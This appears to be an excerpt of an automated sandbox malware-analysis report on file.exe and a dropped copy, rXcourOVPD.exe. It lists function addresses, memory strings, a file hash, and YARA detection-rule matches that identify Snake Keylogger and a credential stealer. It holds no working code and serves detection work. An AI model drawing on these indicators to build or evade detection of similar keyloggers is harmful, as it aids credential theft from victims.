Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BF97E8	14_2_02BF97E8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BFF778	14_2_02BFF778
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BFC753	14_2_02BFC753
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BFE431	14_2_02BFE431
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BFC470	14_2_02BFC470
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BF4AD9	14_2_02BF4AD9
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BFCA33	14_2_02BFCA33
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BFBBB8	14_2_02BFBBB8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BF6880	14_2_02BF6880
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BFBEB0	14_2_02BFBEB0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BFD7F0	14_2_02BFD7F0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BFD7E0	14_2_02BFD7E0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BFB4F3	14_2_02BFB4F3
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_02BF3573	14_2_02BF3573
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_05967588	14_2_05967588
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_05967E78	14_2_05967E78
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_05963288	14_2_05963288
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_05966DF7	14_2_05966DF7
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_05960D50	14_2_05960D50
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596CD58	14_2_0596CD58
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_05960D60	14_2_05960D60
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596CD68	14_2_0596CD68
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_05960491	14_2_05960491
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596F480	14_2_0596F480
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596C4B8	14_2_0596C4B8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_059604A0	14_2_059604A0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596C4A8	14_2_0596C4A8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596BC08	14_2_0596BC08
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596F471	14_2_0596F471
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596B7B0	14_2_0596B7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596B7A0	14_2_0596B7A0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_059677A8	14_2_059677A8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596AF00	14_2_0596AF00
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596E778	14_2_0596E778
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596E768	14_2_0596E768
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596DEB8	14_2_0596DEB8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596DEC8	14_2_0596DEC8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596AEEF	14_2_0596AEEF
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596D618	14_2_0596D618
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_05966E00	14_2_05966E00
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596D609	14_2_0596D609
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_05967E2A	14_2_05967E2A
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596D1B0	14_2_0596D1B0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596D1C0	14_2_0596D1C0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596C910	14_2_0596C910
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596C903	14_2_0596C903
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_05960900	14_2_05960900
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596F8D8	14_2_0596F8D8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596F8C9	14_2_0596F8C9
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_059608F0	14_2_059608F0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596F018	14_2_0596F018
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_05960006	14_2_05960006
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596F028	14_2_0596F028
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596C050	14_2_0596C050
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_05960040	14_2_05960040
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596C060	14_2_0596C060
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596EBD0	14_2_0596EBD0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596EBC1	14_2_0596EBC1
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596BBF8	14_2_0596BBF8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596E310	14_2_0596E310
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596E320	14_2_0596E320
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596B358	14_2_0596B358
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596B348	14_2_0596B348
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596DA70	14_2_0596DA70
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_05963278	14_2_05963278
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_0596DA63	14_2_0596DA63
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A4A6B0	14_2_06A4A6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A47EB3	14_2_06A47EB3
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A4BFE8	14_2_06A4BFE8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A48D80	14_2_06A48D80
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A4AD00	14_2_06A4AD00
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A40D48	14_2_06A40D48
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A49A18	14_2_06A49A18
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A493D0	14_2_06A493D0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A4B350	14_2_06A4B350
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A478B8	14_2_06A478B8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A4A060	14_2_06A4A060
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A4B9A0	14_2_06A4B9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A4A6A3	14_2_06A4A6A3
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A44783	14_2_06A44783
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A44790	14_2_06A44790
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A46FFB	14_2_06A46FFB
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A4BFD8	14_2_06A4BFD8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A47F00	14_2_06A47F00
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A46748	14_2_06A46748
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A46758	14_2_06A46758
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A40488	14_2_06A40488
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A4548B	14_2_06A4548B
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A45498	14_2_06A45498
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A40498	14_2_06A40498
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A4ACF0	14_2_06A4ACF0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A47460	14_2_06A47460
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A47450	14_2_06A47450
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A435A8	14_2_06A435A8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A40D39	14_2_06A40D39
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A45D3B	14_2_06A45D3B
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A48D70	14_2_06A48D70
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A45D48	14_2_06A45D48
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A49A07	14_2_06A49A07
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A46BA0	14_2_06A46BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A46BB0	14_2_06A46BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A44BE8	14_2_06A44BE8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A493C0	14_2_06A493C0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A44BD8	14_2_06A44BD8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A44300	14_2_06A44300
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A44310	14_2_06A44310
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A4B340	14_2_06A4B340
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A428A8	14_2_06A428A8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A478A8	14_2_06A478A8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A458E0	14_2_06A458E0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A408E1	14_2_06A408E1
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A458F0	14_2_06A458F0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A408F0	14_2_06A408F0
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A45033	14_2_06A45033
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A40007	14_2_06A40007
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A47008	14_2_06A47008
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A40040	14_2_06A40040
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A45040	14_2_06A45040
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A4A050	14_2_06A4A050
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A461B8	14_2_06A461B8
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A4B99B	14_2_06A4B99B
Source: C:\Users\user\Desktop\file.exe	Code function: 14_2_06A461C8	14_2_06A461C8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_028FDD14	15_2_028FDD14
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_050B76C8	15_2_050B76C8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_050B0006	15_2_050B0006
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_050B0040	15_2_050B0040
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_050B76B8	15_2_050B76B8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_050B5A52	15_2_050B5A52
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_06F303C8	15_2_06F303C8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_06F32728	15_2_06F32728
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_06FFA250	15_2_06FFA250
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_06FFA240	15_2_06FFA240
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_06FFC380	15_2_06FFC380
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_06FF9E18	15_2_06FF9E18
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_06FF9E09	15_2_06FF9E09
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_06FFBA50	15_2_06FFBA50
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_06FF99E0	15_2_06FF99E0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 15_2_0B7D2458	15_2_0B7D2458
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E4C190	20_2_00E4C190
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E46108	20_2_00E46108
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E4B328	20_2_00E4B328
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E4C470	20_2_00E4C470
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E4E431	20_2_00E4E431
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E497E8	20_2_00E497E8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E4F778	20_2_00E4F778
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E4C753	20_2_00E4C753
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E46730	20_2_00E46730
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E44AD9	20_2_00E44AD9
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E4CA33	20_2_00E4CA33
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E4BBB8	20_2_00E4BBB8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E4BEB0	20_2_00E4BEB0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E4B4F3	20_2_00E4B4F3
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E43573	20_2_00E43573
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E4D7E0	20_2_00E4D7E0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_00E4D7F0	20_2_00E4D7F0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_0503AD00	20_2_0503AD00
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05030D48	20_2_05030D48
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05038D80	20_2_05038D80
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_0503BFE8	20_2_0503BFE8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05037E08	20_2_05037E08
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_0503A6B0	20_2_0503A6B0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_0503B9A0	20_2_0503B9A0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_0503A060	20_2_0503A060
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_050378B8	20_2_050378B8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_0503B350	20_2_0503B350
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_050393D0	20_2_050393D0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05039A18	20_2_05039A18
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05035D3B	20_2_05035D3B
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05030D39	20_2_05030D39
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05035D48	20_2_05035D48
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05038D6F	20_2_05038D6F
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_050335A8	20_2_050335A8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05037450	20_2_05037450
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05037460	20_2_05037460
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_0503548B	20_2_0503548B
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05030488	20_2_05030488
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05035498	20_2_05035498
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05030498	20_2_05030498
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_0503ACF0	20_2_0503ACF0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05037F00	20_2_05037F00
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05036747	20_2_05036747
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05036758	20_2_05036758
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05034783	20_2_05034783
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05034790	20_2_05034790
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_0503BFD8	20_2_0503BFD8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05036FFC	20_2_05036FFC
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_0503A6A2	20_2_0503A6A2
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_0503B991	20_2_0503B991
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_0503B99B	20_2_0503B99B
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_050361B8	20_2_050361B8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_050361C8	20_2_050361C8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05030006	20_2_05030006
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05037008	20_2_05037008
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05035033	20_2_05035033
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05030040	20_2_05030040
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05035040	20_2_05035040
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_0503A050	20_2_0503A050
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_050328A8	20_2_050328A8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_050378A8	20_2_050378A8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_050308E1	20_2_050308E1
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_050358E0	20_2_050358E0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_050358F0	20_2_050358F0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_050308F0	20_2_050308F0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05034300	20_2_05034300
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05034310	20_2_05034310
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_0503B340	20_2_0503B340
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05036BA0	20_2_05036BA0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05036BB0	20_2_05036BB0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_050393C0	20_2_050393C0
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05034BD8	20_2_05034BD8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05034BE8	20_2_05034BE8
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_05039A07	20_2_05039A07
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Code function: 20_2_055F8A0C	20_2_055F8A0C

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\rXcourOVPD.exe 1D409E94B935C68A4B4841A1B2E05C6ABF1EA827C419EAB8BF3EE23229574160

Source: file.exe, 00000004.00000002.1360884679.00000000067CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.E vs file.exe
Source: file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorlib.dllT vs file.exe
Source: file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $_q,\\StringFileInfo\\040904B0\\OriginalFilename vs file.exe
Source: file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedaDgl.exe" vs file.exe
Source: file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $_q,\\StringFileInfo\\000004B0\\OriginalFilename vs file.exe
Source: file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs file.exe
Source: file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.dllT vs file.exe
Source: file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs file.exe
Source: file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs file.exe
Source: file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Core.dllT vs file.exe
Source: file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Xml.dllT vs file.exe
Source: file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs file.exe
Source: file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs file.exe
Source: file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs file.exe
Source: file.exe, 00000004.00000002.1361185726.0000000006B80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
Source: file.exe, 00000004.00000002.1360656745.0000000006720000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs file.exe
Source: file.exe, 00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs file.exe
Source: file.exe, 00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
Source: file.exe, 00000004.00000002.1358186546.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs file.exe
Source: file.exe, 00000004.00000000.1283506304.0000000000192000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamedaDgl.exe" vs file.exe
Source: file.exe, 00000004.00000002.1356112223.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 0000000E.00000002.3758482219.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs file.exe
Source: file.exe, 0000000E.00000002.3758725117.0000000000F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dll] vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamedaDgl.exe" vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 15.2.rXcourOVPD.exe.3c228c0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.rXcourOVPD.exe.3c228c0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.rXcourOVPD.exe.3c228c0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.rXcourOVPD.exe.3c228c0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2.file.exe.38117c0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.file.exe.38117c0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.file.exe.38117c0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.file.exe.38117c0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2.file.exe.37f17a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.rXcourOVPD.exe.3c028a0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
